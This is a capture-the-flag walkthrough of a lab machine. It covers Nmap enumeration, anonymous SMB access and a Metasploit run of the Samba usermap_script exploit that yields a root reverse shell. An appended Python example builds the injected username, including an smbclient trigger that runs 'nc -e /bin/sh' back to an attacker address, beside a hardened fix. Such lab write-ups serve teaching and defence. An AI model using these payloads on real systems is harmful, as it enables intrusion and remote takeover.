This is a very simple machine, barely worth writing up, but I eventually decided to do it purely for completeness.
I scanned the machine with Nmap and saw the following details:
# Nmap 7.70 scan initiated Thu Aug 22 10:10:07 2019 as: nmap -A -p- -oN scan 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up (0.065s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.3
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Linux 2.6.23 (92%), Belkin N300 WAP (Linux 2.6.30) (92%), Control4 HC-300 home controller (92%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (92%), Dell Integrated Remote Access Controller (iDRAC5) (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Citrix XenServer 5.5 (Linux 2.6.18) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2d23h03m38s, deviation: 0s, median: -2d23h03m38s
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-08-19T02:31:04-04:00
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 445/tcp)
HOP RTT      ADDRESS
1   30.07 ms 10.10.14.1
2   31.77 ms 10.10.10.3

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Aug 22 10:35:22 2019 -- 1 IP address (1 host up) scanned in 1516.09 seconds
From this we can see that FTP, SMB, distcc and SSH are all running. FTP allows anonymous login, but there are no files on it. Next I tried connecting to SMB, again without credentials:
root@kali://root/websvr# smbclient \\\\10.10.10.3\\tmp -p 445
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Dec  6 16:56:00 2019
  ..                                 DR        0  Sun May 20 20:36:12 2012
  orbit-makis                        DR        0  Fri Dec  6 11:25:31 2019
  .ICE-unix                          DH        0  Fri Dec  6 11:03:09 2019
  .X11-unix                          DH        0  Fri Dec  6 11:03:34 2019
  gconfd-makis                       DR        0  Fri Dec  6 11:25:31 2019
  .X0-lock                           HR       11  Fri Dec  6 11:03:34 2019
  5120.jsvc_up                        R        0  Fri Dec  6 11:04:17 2019

		7282168 blocks of size 1024. 5678284 blocks available
You can see from the output that we also have anonymous SMB access to the tmp share. However, after browsing around, there were no useful files stored in SMB either.
One of the details the Nmap scan picked up is that the server is running Samba 3.0.20-Debian. I searched Google for vulnerabilities affecting this version of Samba and found the Username Map Script exploit (CVE-2007-2447), which executes commands by supplying a username containing shell metacharacters. Samba 3.0.20 through 3.0.25rc3 passes the client-supplied username to the script configured by the `username map script` option through a shell, so backticks in the username become a command run with smbd's privileges (root here). The bug is only reachable when that option is set in smb.conf, which it evidently is on this host since the exploit succeeds; no credentials are needed because the injection happens during session setup, before authentication completes. The exploit is included in Metasploit, so I launched msfconsole and ran it:
msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > set RHOST 10.10.10.3
RHOST => 10.10.10.3
msf5 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP double handler on 10.10.14.25:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo RXu673TIo0yJNYIz;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "RXu673TIo0yJNYIz\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.25:4444 -> 10.10.10.3:59078) at 2019-12-09 20:05:13 +0000
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
whoami
root
cd root
ls
Desktop
reset_logs.sh
root.txt
vnc.log
cat root.txt
[REDACTED]
From the output you can see that the exploit ran successfully. Running whoami shows that the shell is running as root, so there is no privilege escalation step at all. From there I was able to change into /root and cat root.txt.
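To make the mechanism behind usermap_script concrete, here is an added example (not part of the original writeup and not Samba's or Metasploit's own code) that reproduces the command-injection class offline: the username is interpolated into a shell command line the way Samba 3.0.20's map-script invocation did, beside a hardened version that validates the name and never hands it to a shell. It also builds the username the Metasploit module sends and, as an assumed manual alternative, the smbclient `logon` invocation that triggers the same session setup; the `echo` stand-in for the map script, the target/LHOST/LPORT values and the `nc -e` reverse shell on the target are all assumptions, nothing here talks to 10.10.10.3.

```python
"""Added example: command injection via Samba's 'username map script'
(CVE-2007-2447), the bug exploit/multi/samba/usermap_script abuses.
'echo' stands in for the map script so the demo runs offline."""
import re
import subprocess
from typing import List, Optional


def build_usermap_payload(command: str, detach: bool = True) -> str:
    """Username the exploit sends: a map-script lookup key ("/=") followed by
    the command in backticks. The Metasploit module wraps it in nohup so the
    spawned shell outlives the SMB session; detach=False drops that for the
    offline demo."""
    inner = f"nohup {command}" if detach else command
    return "/=`" + inner + "`"


def smbclient_manual_trigger(target: str, lhost: str, lport: int) -> List[str]:
    """Assumed manual alternative to Metasploit: smbclient's 'logon' command
    performs a session setup with the given username, which is all the bug
    needs. Assumes a netcat with -e on the target. Returns argv, not executed."""
    payload = build_usermap_payload(f"nc -e /bin/sh {lhost} {lport}")
    return ["smbclient", f"//{target}/tmp", "-N", "-c", f'logon "{payload}"']


def vulnerable_map_user(username: str) -> str:
    """Vulnerable pattern: the username is pasted into a shell command line,
    as Samba 3.0.20 did when running 'username map script'. Backticks in the
    name are evaluated by /bin/sh before the script ever sees them."""
    cmd = f"echo {username}"  # stand-in for: /etc/samba/scripts/mapusers.sh <username>
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout.strip()


def hardened_map_user(username: str) -> Optional[str]:
    """Hardened pattern: reject anything outside a conservative username charset
    (no space, quote, backtick, $, ;, |, &), then invoke the script with an argv
    list so no shell parses the username at all. Returns None on rejection."""
    if not re.fullmatch(r"[A-Za-z0-9._-]{1,64}", username):
        return None
    return subprocess.run(["echo", username], capture_output=True, text=True).stdout.strip()


if __name__ == "__main__":
    probe = build_usermap_payload("printf INJECTED", detach=False)
    print("payload    :", probe)
    print("vulnerable :", vulnerable_map_user(probe))  # shell ran printf: "/=INJECTED"
    print("hardened   :", hardened_map_user(probe))    # None: rejected before any exec
    print("hardened   :", hardened_map_user("makis"))  # ordinary name still maps
    print(" ".join(smbclient_manual_trigger("10.10.10.3", "10.10.14.25", 4444)))
```

The vulnerable function shows why the fix is structural rather than a blocklist: once a user-controlled string reaches `sh -c`, every metacharacter the shell knows is an injection vector, so the hardened version both constrains the charset and removes the shell from the call path. On a real Samba 3.0.20 host the equivalent mitigation is removing `username map script` from the `[global]` section of smb.conf or upgrading to 3.0.25, where the lookup no longer passes the name through a shell.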
Follow: Hunter网络安全 (Hunter Cybersecurity) for more updates
Website: bbs.kylzrv.com
CTF team: Hunter网络安全
Article: Xtrato
Layout: Hunter-匿名者
Reprinted from: https://blog.csdn.net/qq_25879801/article/details/111997172